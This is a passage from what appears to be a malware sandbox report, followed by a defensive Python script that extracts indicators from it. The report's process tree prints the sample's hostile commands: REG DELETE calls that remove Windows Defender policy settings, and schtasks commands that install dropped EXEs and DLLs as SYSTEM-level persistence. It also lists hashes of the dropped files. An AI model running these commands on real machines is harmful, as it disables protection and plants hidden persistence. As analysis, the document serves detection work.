        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
        4⤵
        PID:2840
    • C:\Windows\SysWOW64\cmd.exe
      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
      3⤵
      PID:2884
      • C:\Windows\SysWOW64\reg.exe
        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
        4⤵
        PID:2844
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "MFUxwpyluZmBswWip" /SC once /ST 07:29:58 /RU "SYSTEM" /TR "\"C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\GUgpQsE.exe\" 18 /site_id 525403 /S" /V1 /F
      3⤵
      • Drops file in Windows directory
      • Scheduled Task/Job: Scheduled Task
      PID:3052
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "MFUxwpyluZmBswWip"
      3⤵
      PID:2364
  • C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\GUgpQsE.exe
    C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\GUgpQsE.exe 18 /site_id 525403 /S
    2⤵
    • Executes dropped EXE
    • Drops Chrome extension
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    PID:928
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "bKwcWZekAnYWEgmozo"
      3⤵
      • System Location Discovery: System Language Discovery
      PID:2552
    • C:\Windows\SysWOW64\cmd.exe
      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
      3⤵
      • System Location Discovery: System Language Discovery
      PID:2644
      • C:\Windows\SysWOW64\reg.exe
        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
        4⤵
        • System Location Discovery: System Language Discovery
        PID:1472
    • C:\Windows\SysWOW64\cmd.exe
      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
      3⤵
      PID:1596
      • C:\Windows\SysWOW64\reg.exe
        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
        4⤵
        PID:2276
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ZUXSmeDRU\eGjKlH.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "SEVCueFJyRflUhU" /V1 /F
      3⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:2380
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "SEVCueFJyRflUhU2" /F /xml "C:\Program Files (x86)\ZUXSmeDRU\uFzBbJL.xml" /RU "SYSTEM"
      3⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:3056
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /END /TN "SEVCueFJyRflUhU"
      3⤵
      • System Location Discovery: System Language Discovery
      PID:1508
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "SEVCueFJyRflUhU"
      3⤵
      • System Location Discovery: System Language Discovery
      PID:2868
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "iJzencGmrLwIJF" /F /xml "C:\Program Files (x86)\UBqYudvSNocU2\SDnAqaA.xml" /RU "SYSTEM"
      3⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:2612
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "qYXqheuptEbIX2" /F /xml "C:\ProgramData\hrOORTLiECQfZJVB\ZKZlOZs.xml" /RU "SYSTEM"
      3⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:2928
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "JDYpgkNAOwNKhospY2" /F /xml "C:\Program Files (x86)\xonCRuklPFipnPeqKpR\KCoMwBQ.xml" /RU "SYSTEM"
      3⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:2776
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "hPTErtfTjvBJRSQKVfY2" /F /xml "C:\Program Files (x86)\oXjeNNLqKAotC\OYezHJn.xml" /RU "SYSTEM"
      3⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:2228
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "NGWtXtGwgKKYsphzV" /SC once /ST 09:31:35 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\YSrBLfWUtIHnuviW\vtvSHDDb\tekCqhb.dll\",#1 /site_id 525403" /V1 /F
      3⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:2940
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "NGWtXtGwgKKYsphzV"
      3⤵
      PID:2284
    • C:\Windows\SysWOW64\cmd.exe
      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
      3⤵
      PID:2644
  • C:\Windows\system32\rundll32.EXE
    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YSrBLfWUtIHnuviW\vtvSHDDb\tekCqhb.dll",#1 /site_id 525403
    2⤵
    PID:2884
    • C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YSrBLfWUtIHnuviW\vtvSHDDb\tekCqhb.dll",#1 /site_id 525403
      3⤵
      PID:2376
• C:\Windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam
  1⤵
  PID:2100
• C:\Windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam
  1⤵
  PID:2872
• C:\Windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam
  1⤵
  PID:1996

Network

MITRE ATT&CK Enterprise v15

Downloads

• C:\Program Files (x86)\UBqYudvSNocU2\SDnAqaA.xml (Filesize 2KB)
• C:\Program Files (x86)\ZUXSmeDRU\uFzBbJL.xml (Filesize 2KB)
• C:\Program Files (x86)\oXjeNNLqKAotC\OYezHJn.xml (Filesize 2KB)
• C:\Program Files (x86)\xonCRuklPFipnPeqKpR\KCoMwBQ.xml (Filesize 2KB)
• C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi (Filesize 1.1MB)
• C:\ProgramData\hrOORTLiECQfZJVB\ZKZlOZs.xml (Filesize 2KB)
• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json (Filesize 187B)
• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json (Filesize 136B)
• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json (Filesize 150B)
• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences (Filesize 9KB)
• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (Filesize 7KB; three distinct versions captured)
• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\prefs.js (Filesize 7KB)
• C:\Windows\Temp\YSrBLfWUtIHnuviW\oafJjutu\uCLzMqtKLlfsPnpP.wsf (Filesize 8KB)
• C:\Windows\Temp\YSrBLfWUtIHnuviW\vtvSHDDb\tekCqhb.dll (Filesize 4.6MB)
• C:\Windows\system32\GroupPolicy\Machine\Registry.pol (Filesize 5KB)
• C:\Windows\system32\GroupPolicy\gpt.ini (Filesize 268B)

                                                          • \Users\Admin\AppData\Local\Temp\7zS9B46.tmp\Install.exe

                                                            Filesize

                                                            6.8MB

                                                            MD5

                                                            6cb87a9fc7dc1f2a5410fd428f5460f0

                                                            SHA1

                                                            2885b2d28a333d7bd9d6488ba2bf7312fc811e3a

                                                            SHA256

                                                            fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52

                                                            SHA512

                                                            4c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269

                                                          • \Windows\Temp\YSrBLfWUtIHnuviW\vtvSHDDb\tekCqhb.dll

                                                            Filesize

                                                            3.7MB

                                                            MD5

                                                            303a72064265aeeba9ff04ddf0f6ddcf

                                                            SHA1

                                                            e981084f825b451a6b38a62af86854b0676e1da3

                                                            SHA256

                                                            3ad4f16c68941a286023e3db11d477528f3a9841488a2ae4615eef411207bb00

                                                            SHA512

                                                            03da4292844d79fb4d3e79ca4d2e19a3954c8acab28eaa3075de7883deaeead9f7c5b95c6f445a58541ebce0294562e00af57f316496c2a42f900f87f908163c

                                                          • \Windows\Temp\YSrBLfWUtIHnuviW\vtvSHDDb\tekCqhb.dll

                                                            Filesize

                                                            3.3MB

                                                            MD5

                                                            45feaac2e7a01518d3b4aeb43fd346a9

                                                            SHA1

                                                            7ad7360f753acaa4179f38c363f0eb18457decfb

                                                            SHA256

                                                            773ca23fb7b6f2eef2daeb807967774ff7a679823d86e64d315baf0c8babb870

                                                            SHA512

                                                            01803b9036cd0aca6532c5d598d97a58c3a301efdbcd352d26470f2158e911782c48da84879be41315e213007529d5a1113fae4aa615464a47a9c8307fce799a

                                                          • \Windows\Temp\YSrBLfWUtIHnuviW\vtvSHDDb\tekCqhb.dll

                                                            Filesize

                                                            3.4MB

                                                            MD5

                                                            0e7d35221bc8826ab0384b4e698f28fc

                                                            SHA1

                                                            43364902f168bc4d2e3aca32be61165f93617a75

                                                            SHA256

                                                            1f546a893fdab1b904d61b26f0bf9762f8008f311e9b0fde5a6f76ee9ef953ea

                                                            SHA512

                                                            83bf69c8e39212d2d9538998c10e330eb90df388c845ffd9eb6e1d522fa3e9e4c3fec7c7754927d0e339f8bd4126be3510763029b1824ae5ed9609922a8d0153

                                                          • \Windows\Temp\YSrBLfWUtIHnuviW\vtvSHDDb\tekCqhb.dll

                                                            Filesize

                                                            3.6MB

                                                            MD5

                                                            785d176a4faabd7f1edbdd3401373294

                                                            SHA1

                                                            ce61c4fcbc1e411aa7fee0372bcc80c1c8026377

                                                            SHA256

                                                            07a5ceb3efcf421d5512abf9dfc5e5ceb2bf951a1d915d78d43e2cc87efb541a

                                                            SHA512

                                                            3ceea3b78f30b9c0380f8071f7a6e04fda448ca647bbce8443805172cf07c7f2ceeae589f6ff46ca47d978c975930043fa9c5af40e11df419924a85dea8a7f45

                                                          • memory/676-37-0x0000000002410000-0x0000000002418000-memory.dmp

                                                            Filesize

                                                            32KB

                                                          • memory/676-36-0x000000001B3B0000-0x000000001B692000-memory.dmp

                                                            Filesize

                                                            2.9MB

                                                          • memory/928-278-0x0000000002B10000-0x0000000002B86000-memory.dmp

                                                            Filesize

                                                            472KB

                                                          • memory/928-292-0x0000000004360000-0x000000000441A000-memory.dmp

                                                            Filesize

                                                            744KB

                                                          • memory/928-110-0x0000000002890000-0x00000000028F8000-memory.dmp

                                                            Filesize

                                                            416KB

                                                          • memory/928-75-0x0000000002C90000-0x0000000002D15000-memory.dmp

                                                            Filesize

                                                            532KB

                                                          • memory/2288-10-0x0000000010000000-0x0000000010B5D000-memory.dmp

                                                            Filesize

                                                            11.4MB

                                                          • memory/2528-47-0x000000001B220000-0x000000001B502000-memory.dmp

                                                            Filesize

                                                            2.9MB

                                                          • memory/2528-48-0x0000000001F50000-0x0000000001F58000-memory.dmp

                                                            Filesize

                                                            32KB

                                                          • memory/2752-19-0x0000000002660000-0x0000000002668000-memory.dmp

                                                            Filesize

                                                            32KB

                                                          • memory/2752-18-0x000000001B270000-0x000000001B552000-memory.dmp

                                                            Filesize

                                                            2.9MB
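Two things in the listing above deserve more than a copy-paste into a blocklist: tekCqhb.dll is captured five times at the same path under Windows\Temp (once with the C: drive letter, four times without) with five different sizes and hashes, so the file is rewritten while the sample runs and any single hash for it is a weak indicator; and the sample writes C:\Windows\system32\GroupPolicy\Machine\Registry.pol and gpt.ini, the local Group Policy store, which is worth flagging on its own regardless of hash. The script below is an added example, not part of the sandbox report or its tooling. It parses records in the bullet/field/value shape the report uses (a subset of the entries above, Filesize and SHA256 only, reflowed one field per line), normalises the drive-letter difference so the repeated path is recognised as one file, flags the sensitive locations, and cross-checks each memory-region entry's address range against its stated Filesize. The path patterns and their labels are my own heuristics, and the 1024-based KB/MB units are an assumption that happens to match every figure on this page.

```python
"""Pull IoCs out of a Triage-style dropped-files / memory-region listing.

Added example (not the report's own tooling). DROPPED is a subset of the
report's records, reflowed one field per line; SHA1/SHA512 omitted.
"""
import re
from collections import defaultdict

DROPPED = r"""
• C:\Windows\Temp\YSrBLfWUtIHnuviW\oafJjutu\uCLzMqtKLlfsPnpP.wsf
Filesize
8KB
SHA256
055d176c2821b7344e77d07a8dd4d451094f53d4725e50f8a5511122792eb7bf
• C:\Windows\Temp\YSrBLfWUtIHnuviW\vtvSHDDb\tekCqhb.dll
Filesize
4.6MB
SHA256
195e63bbc28af2d9fe385f1a843eafc381f9a2d922192a1227e3592a904d8c50
• C:\Windows\system32\GroupPolicy\Machine\Registry.pol
Filesize
5KB
SHA256
fc2c39e0dc4a7e8e5f576cfef0253ef6adca13617ea7983b0f0a0ca2ddab8ef3
• \Users\Admin\AppData\Local\Temp\7zS9B46.tmp\Install.exe
Filesize
6.8MB
SHA256
fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52
• \Windows\Temp\YSrBLfWUtIHnuviW\vtvSHDDb\tekCqhb.dll
Filesize
3.7MB
SHA256
3ad4f16c68941a286023e3db11d477528f3a9841488a2ae4615eef411207bb00
• \Windows\Temp\YSrBLfWUtIHnuviW\vtvSHDDb\tekCqhb.dll
Filesize
3.3MB
SHA256
773ca23fb7b6f2eef2daeb807967774ff7a679823d86e64d315baf0c8babb870
"""

# Heuristic path patterns (my own labels), matched against the normalised
# lower-case path, that merit review independent of the file's hash.
SENSITIVE = (
    (r"\\windows\\system32\\grouppolicy\\", "local Group Policy store written"),
    (r"\\windows\\temp\\.*\.(dll|wsf|exe)$", "code staged under Windows\\Temp"),
    (r"\\appdata\\local\\temp\\7zs[0-9a-f]+\.tmp\\", "7-Zip SFX extraction dir"),
)
MEM_RE = re.compile(r"^memory/(\d+)-\d+-0x([0-9a-f]+)-0x([0-9a-f]+)-memory\.dmp$", re.I)
UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2}  # assumed: report uses 1024-based units


def parse_records(text):
    """Turn '• path' followed by field/value line pairs into a list of dicts."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    records, i = [], 0
    while i < len(lines):
        if lines[i].startswith("•"):
            records.append({"path": lines[i][1:].strip()})
            i += 1
        elif records and i + 1 < len(lines):
            records[-1][lines[i].lower()] = lines[i + 1]
            i += 2
        else:
            i += 1
    return records


def normalize_path(path):
    """Drop the drive letter and case so 'C:\\X' and '\\X' name the same file."""
    return re.sub(r"^[A-Za-z]:", "", path).replace("/", "\\").lower()


def rewritten_paths(records):
    """Paths seen more than once with different content: the file is rewritten in place."""
    seen = defaultdict(set)
    for rec in records:
        if "sha256" in rec:
            seen[normalize_path(rec["path"])].add(rec["sha256"])
    return {p: h for p, h in seen.items() if len(h) > 1}


def flag_sensitive(records):
    """(original path, reason) for every record matching a SENSITIVE pattern."""
    hits = []
    for rec in records:
        npath = normalize_path(rec["path"])
        for pattern, why in SENSITIVE:
            if re.search(pattern, npath):
                hits.append((rec["path"], why))
                break
    return hits


def region_size(entry):
    """(pid, bytes) for a memory/<pid>-<n>-<start>-<end>-memory.dmp entry."""
    m = MEM_RE.match(entry)
    if not m:
        raise ValueError(f"not a memory region entry: {entry}")
    return int(m.group(1)), int(m.group(3), 16) - int(m.group(2), 16)


def parse_size(text):
    """'11.4MB' -> bytes, using the assumed 1024-based units."""
    m = re.fullmatch(r"([\d.]+)(B|KB|MB)", text.strip())
    return float(m.group(1)) * UNITS[m.group(2)]


def size_matches(entry, stated, tolerance=0.02):
    """True when the address range agrees with the stated Filesize (rounding allowed)."""
    _, nbytes = region_size(entry)
    expected = parse_size(stated)
    return abs(nbytes - expected) / expected <= tolerance


if __name__ == "__main__":
    recs = parse_records(DROPPED)
    for path, hashes in rewritten_paths(recs).items():
        print(f"rewritten in place: {path} ({len(hashes)} distinct SHA256)")
    for path, why in flag_sensitive(recs):
        print(f"{why}: {path}")
```

Run as a script it reports the one rewritten path (three distinct SHA256 values in this subset, five in the full listing) and a reason for each of the six records. The drive-letter normalisation is the piece most often missed when these listings are turned into hunt queries: without it the C:\ and bare \ forms of tekCqhb.dll look like two files. size_matches is a sanity check for the memory entries; a region whose stated size does not match its address range usually means a transcription error in the IoC, not a finding.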